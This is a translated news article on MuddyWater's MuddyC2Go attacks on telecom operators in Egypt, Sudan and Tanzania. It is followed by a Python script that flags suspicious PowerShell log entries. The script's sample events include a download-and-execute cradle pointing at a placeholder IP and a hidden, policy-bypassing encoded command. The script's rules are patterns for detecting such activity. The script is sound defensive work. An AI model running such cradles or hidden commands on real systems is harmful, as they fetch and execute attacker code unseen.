Telecommunications sector in Egypt, Sudan and Tanzania hit by MuddyWater hackers

Brother

Iran's cyber weapon has turned its muzzle toward African countries.

The hacker group MuddyWater, affiliated with Iran's Ministry of Intelligence and Security, recently used its custom C2 framework MuddyC2Go in attacks on the telecommunications sector in Egypt, Sudan and Tanzania, according to a team of Symantec researchers.

MuddyWater, active since 2017, is also tracked as Seedworm, Boggy Serpens, Cobalt Ulster and other names. MuddyC2Go, written in Go, was first discovered by Deep Instinct in November of this year. It replaces the group's previous C2 frameworks, PhonyC2 and MuddyC3.

MuddyC2Go is delivered as an executable that embeds a PowerShell script which automatically connects to the attackers' C2 server, giving them remote access to the victim's system.

A hallmark of the group's attacks is the use of phishing emails and vulnerabilities in outdated, unpatched software for initial access, followed by reconnaissance, lateral movement and collection of the data the attackers are after.

In the latest attacks, recorded in November 2023, the attackers also used SimpleHelp, Venom Proxy, custom keyloggers and other publicly available programs. To disguise its activity, the group blends the tools in its arsenal so as to remain undetected for as long as possible while pursuing its strategic goals.

It is noted that MuddyWater keeps refining its toolset and relies heavily on PowerShell and related tools and scripts. This underlines the need for organizations to monitor for any suspicious use of PowerShell on their networks.
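As an added illustration of that monitoring advice (example code, not from Symantec or the original post), the script below triages PowerShell script-block log entries with a simple weighted rule set. The event records, rule weights and threshold are constructed for the example; in practice the entries would come from Windows PowerShell Event ID 4104 logging.

```python
import re
from typing import Dict, List

# Constructed sample script-block entries in the shape of Event ID 4104 logs.
# The hosts, users and scripts are invented for this example.
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "alice",
     "script": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"host": "ws-02", "user": "SYSTEM",
     "script": "powershell -nop -w hidden -ep bypass -enc SQBFAFgA"},
    {"host": "srv-03", "user": "svc_backup",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"},
]

# Each rule is (name, pattern, weight). Weights are an assumed scoring scheme
# that a defender would tune against their own baseline of normal PowerShell use.
RULES = [
    ("encoded_command",   re.compile(r"-e(nc|ncodedcommand)?\b", re.I), 3),
    ("hidden_window",     re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("policy_bypass",     re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I), 2),
    ("download_cradle",   re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(IEX|Invoke-Expression)\b", re.I), 3),
    ("no_profile",        re.compile(r"-nop(rofile)?\b", re.I), 1),
]


def score_script_block(script: str) -> Dict[str, int]:
    """Return the names of the rules that fire on one script block, with their weights."""
    return {name: weight for name, pattern, weight in RULES if pattern.search(script)}


def triage(events: List[dict], threshold: int = 4) -> List[dict]:
    """Flag events whose summed rule weights reach the threshold, for analyst review."""
    findings = []
    for event in events:
        hits = score_script_block(event["script"])
        total = sum(hits.values())
        if total >= threshold:
            findings.append({"host": event["host"], "user": event["user"],
                             "score": total, "rules": sorted(hits)})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

A single rule such as a download cradle is a weak signal on its own; the weighting is what separates routine administration from the combined traits that warrant a closer look.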

Thus, yet another act of aggression by state-backed hacker groups highlights the fragility of information security in many critical industries across different countries. Effective counteraction is possible only through the development of strict rules for integrated cybersecurity and their competent application in practice.